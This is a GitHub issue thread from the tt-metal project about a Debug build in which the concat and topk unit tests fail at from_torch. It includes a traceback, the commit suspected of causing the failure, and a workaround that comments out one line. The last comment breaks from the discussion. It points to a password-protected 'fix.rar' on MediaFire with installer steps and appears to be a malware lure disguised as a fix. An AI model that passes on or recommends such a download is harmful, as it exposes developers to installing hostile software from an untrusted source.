### ISSUE TITLE
Debug build is failing

### ISSUE THREAD

**Issue by sjameelTT** [tenstorrent/tt-metal#11903]
To recreate 

`./build_metal.sh -b Debug
pytest "tests/ttnn/unit_tests/operations/test_concat.py" 
pytest "tests/ttnn/unit_tests/operations/test_topk.py"
`

Both tests fail at the `from_torch` call

**Comment by bbradelTT** [comment]
Sample output:
```
pytest "tests/ttnn/unit_tests/operations/test_concat.py"
...
tests/ttnn/utils_for_testing.py:27: in assert_with_pcc
    actual_pytorch_result.shape
ttnn/ttnn/operations/core.py:284: in __torch_function__
    return super().__torch_function__(func, types, func_args, func_kwargs)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
...
        with _C.DisableTorchFunctionSubclass():
>           ret = func(*args, **kwargs)
E           RuntimeError: argument not found
```
ttnn/ttnn/operations/core.py:284 has last been changed in 
https://github.com/tenstorrent/tt-metal/commit/83561689385ec9970280da4ae29fd4745278514d
for https://github.com/tenstorrent/tt-metal/issues/10924

**Comment by bbradelTT** [comment]
I found a workaround. Comment out the previous line:
Change ttnn/ttnn/operations/core.py:283 to
        #func = ttl.tensor.decorate_external_operation(func, function_name=f"(torch) {func.__name__}")
        
It's not great because it disables functionality, but it can unblock debugging other unrelated issues.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
